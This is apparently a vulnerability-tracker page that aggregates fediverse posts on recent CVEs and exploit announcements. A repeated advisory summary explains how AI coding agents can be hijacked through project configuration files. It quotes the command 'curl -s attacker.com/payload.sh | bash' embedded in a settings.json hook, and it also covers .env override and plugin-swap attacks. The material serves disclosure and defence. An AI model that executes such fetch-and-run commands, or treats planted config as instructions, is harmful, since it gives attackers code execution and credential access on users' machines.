updated 2025-11-05T20:30:33

1 posts

Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError coul

1 repos

https://github.com/njawalkar/apache-commons-lang2

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-59250
(8.1 HIGH)

EPSS: 0.08%

updated 2025-10-30T16:35:42.213000

1 posts

Improper input validation in JDBC Driver for SQL Server allows an unauthorized attacker to perform spoofing over a network.

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2019-1367
(7.5 HIGH)

EPSS: 90.77%

updated 2025-10-22T00:32:47

1 posts

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.

1 repos

https://github.com/mandarenmanman/CVE-2019-1367

CVE-2025-59536(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-10-03T14:16:36

1 posts

Due to a bug in the startup trust dialog implementation, Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to

5 repos

https://github.com/NetVanguard-cmd/CVE-2025-59536

https://github.com/TreRB/ai-ide-config-guard

https://github.com/Rohitberiwala/Claude-Code-MCP-Injection-PoC

https://github.com/DBarr3/AETHER-PROTOCOL-P

https://github.com/Razi-Interactive/claude-project-scanner

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2025-54136
(7.2 HIGH)

EPSS: 0.11%

updated 2025-08-25T01:41:36.580000

1 posts

Cursor is a code editor built for programming with AI. In versions 1.2.4 and below, attackers can achieve remote and persistent code execution by modifying an already trusted MCP configuration file inside a shared GitHub repository or editing the file locally on the target's machine. Once a collaborator accepts a harmless MCP, the attacker can silently swap it for a malicious command (e.g., calc.e

1 repos

https://github.com/PRE5T0/CVE-2025-54136

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2025-47987
(7.8 HIGH)

EPSS: 0.53%

updated 2025-07-14T17:38:41.223000

1 posts

Heap-based buffer overflow in Windows Cred SSProvider Protocol allows an authorized attacker to elevate privileges locally.

1 repos

https://github.com/Kryptoenix/CVE-2025-47987_PoC

exploitdb_bot@mastodon.social at 2026-04-30T09:51:08.000Z ##

🚨 New Exploit: Windows 11 23H2 - Denial of Service (DoS)
📋 CVE: CVE-2025-47987
👤 Author: tryhardertryh

🔗 exploit-db.com/exploits/52541

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-47987

##

CVE-2024-46987
(7.7 HIGH)

EPSS: 24.00%

updated 2025-04-17T19:15:59.520000

1 posts

Camaleon CMS is a dynamic and advanced content management system based on Ruby on Rails. A path traversal vulnerability accessible via MediaController's download_private_file method allows authenticated users to download any file on the web server Camaleon CMS is running on (depending on the file permissions). This issue may lead to Information Disclosure. This issue has been addressed in release

10 repos

https://github.com/sparrowhawk1113/Exploit-for-CVE-2024-46987

https://github.com/Ik0nw/CVE-2024-46987

https://github.com/0xmrsecurity/Public_Poc

https://github.com/BLUEBERRYP1LL/CVE-2024-46987

https://github.com/ramzerk/CVE-2024-46987

https://github.com/L1337Xi/CVE-2024-46987

https://github.com/advaitpathak21/CVE-2024-46987

https://github.com/bootstrapbool/msf-cve-2024-46987

https://github.com/Goultarde/CVE-2024-46987

https://github.com/Rival420/CVE-2024-46987

exploitdb_bot@mastodon.social at 2026-04-30T07:31:12.000Z ##

🚨 New Exploit: Camaleon CMS v2.9.0 - Path Traversal
📋 CVE: CVE-2024-46987
👤 Author: velampudisakshi

🔗 exploit-db.com/exploits/52531

#ExploitDB #InfoSec #CyberSecurity #CVE-2024-46987

##

CVE-2025-29787(CVSS UNKNOWN)

EPSS: 0.33%

updated 2025-03-19T15:51:05

1 posts

### Summary In the archive extraction routine of affected versions of the `zip` crate, symbolic links earlier in the archive are allowed to be used for later files in the archive without validation of the final canonicalized path, allowing maliciously crafted archives to overwrite arbitrary files in the file system when extracted. ### Details This is a variant of the [zip-slip](https://github.

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

exploitdb_bot@mastodon.social at 2026-04-30T08:01:06.000Z ##

🚨 New Exploit: Js2Py 0.74 - RCE
📋 CVE: CVE-2024-28397
👤 Author: alisunbul

🔗 exploit-db.com/exploits/52532

#ExploitDB #InfoSec #CyberSecurity #CVE-2024-28397

##

exploitdb_bot@mastodon.social at 2026-04-30T08:16:05.000Z ##

🚨 New Exploit: Frigate NVR 0.16.3 - Remote Code Execution
📋 CVE: CVE-2026-25643
👤 Author: jduardo2704

🔗 exploit-db.com/exploits/52533

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25643

##

CVE-2026-42238
(0 None)

EPSS: 0.00%

2 posts

N/A

beyondmachines1 at 2026-04-30T08:01:44.217Z ##

Nginx UI Patches Critical RCE and Admin Takeover Vulnerabilities

Nginx UI released version 2.3.8 to patch four vulnerabilities, including a critical unauthenticated remote code execution flaw (CVE-2026-42238) and multiple high-severity setup takeover issues. These flaws allow attackers to gain full administrative control, execute arbitrary commands, and steal sensitive configuration secrets.

**If you are running Nginx UI, if possible make sure the management interface is isolated from the internet and accessible only from trusted networks or via VPN. Update to version 2.3.8 ASAP and rotate all secrets (JWT keys, node secrets, API keys) since older versions are vulnerable during every restart.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-04-30T08:01:44.000Z ##

Nginx UI Patches Critical RCE and Admin Takeover Vulnerabilities

Nginx UI released version 2.3.8 to patch four vulnerabilities, including a critical unauthenticated remote code execution flaw (CVE-2026-42238) and multiple high-severity setup takeover issues. These flaws allow attackers to gain full administrative control, execute arbitrary commands, and steal sensitive configuration secrets.

**If you are running Nginx UI, if possible make sure the management interface is isolated from the internet and accessible only from trusted networks or via VPN. Update to version 2.3.8 ASAP and rotate all secrets (JWT keys, node secrets, API keys) since older versions are vulnerable during every restart.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24897
(0 None)

EPSS: 0.19%

1 posts

N/A

exploitdb_bot@mastodon.social at 2026-04-30T07:21:12.000Z ##

🚨 New Exploit: Erugo 0.2.14 - Remote Code Execution (RCE)
📋 CVE: CVE-2026-24897
👤 Author: abdulmoiz

🔗 exploit-db.com/exploits/52529

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24897

##

CVE-2026-42208
(0 None)

EPSS: 0.00%

7 posts

N/A

1 repos

https://github.com/imjdl/CVE-2026-42208_lab

allaboutsecurity@mastodon.social at 2026-04-30T05:36:22.000Z ##

LiteLLM-Sicherheitslücke CVE-2026-42208: SQL-Injection binnen 36 Stunden nach Veröffentlichung aktiv ausgenutzt

all-about-security.de/litellm-

#llm #cve #cybersecurity

##

Sempf at 2026-04-30T03:44:31.490Z ##

This is the issue with AI in criminal hands. Speed to market.

thehackernews.com/2026/04/lite

##

allaboutsecurity@mastodon.social at 2026-04-30T05:36:22.000Z ##

LiteLLM-Sicherheitslücke CVE-2026-42208: SQL-Injection binnen 36 Stunden nach Veröffentlichung aktiv ausgenutzt

all-about-security.de/litellm-

#llm #cve #cybersecurity

##

Sempf@infosec.exchange at 2026-04-30T03:44:31.000Z ##

This is the issue with AI in criminal hands. Speed to market.

thehackernews.com/2026/04/lite

##

beyondmachines1@infosec.exchange at 2026-04-29T12:01:44.000Z ##

Critical SQL Injection Vulnerability in LiteLLM AI Gateway Exploited in the Wild

LiteLLM patched a critical pre-authentication SQL injection vulnerability (CVE-2026-42208) that allows attackers to steal cloud provider credentials and master API keys. The flaw was exploited in the wild within 36 hours of disclosure, targeting sensitive database tables used for AI gateway management.

**If you run LiteLLM, update to version 1.83.7 immediately to patch CVE-2026-42208, and isolate the proxy from the internet so it's only reachable from trusted networks. Assume any internet-exposed instance has been compromised - rotate all virtual API keys and provider credentials (OpenAI, Anthropic, AWS Bedrock) right away.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

LLMs@activitypub.awakari.com at 2026-04-29T08:54:39.000Z ## LiteLLM Proxy Gateway Under Active SQLi Exploitation Threat actors are exploiting CVE-2026-42208, a critical pre-authentication SQL injection flaw in LiteLLM, a widely-used open-source gateway for ...


Origin | Interest | Match ##

hackerworkspace@infosec.exchange at 2026-04-28T18:31:03.000Z ##

CVE-2026-42208: Targeted SQL injection against LiteLLM's authentication path discovered 36 hours following vulnerability disclosure | Sysdig

sysdig.com/blog/cve-2026-42208

Read on HackerWorkspace: hackerworkspace.com/article/cv

#authentication #aisecurity #vulnerability

##

CVE-2026-26015
(0 None)

EPSS: 0.00%

2 posts

N/A

offseq at 2026-04-30T00:00:38.128Z ##

🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T00:00:38.000Z ##

🚨 CRITICAL: CVE-2026-26015 in DocsGPT 0.15.0-0.16.0 enables unauthenticated RCE via command injection (CVSS 10). All deployments at risk — patch to 0.16.0 or later now! radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RCE #DocsGPT

##

CVE-2026-7426
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-04-29T23:00:22.000Z ##

🟠 CVE-2026-7426 - High (8.1)

Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:00:22.000Z ##

🟠 CVE-2026-7426 - High (8.1)

Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25262
(0 None)

EPSS: 0.00%

1 posts

N/A

ari@doskel.net at 2026-04-29T17:11:40.000Z ##

ooo its vulnerable to CVE-2026-25262

##

CVE-2026-5545
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-6253
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-7168
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-6429
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-41649
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-28T22:30:23.000Z ##

🟠 CVE-2026-41649 - High (7.7)

Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Visit counter For Websites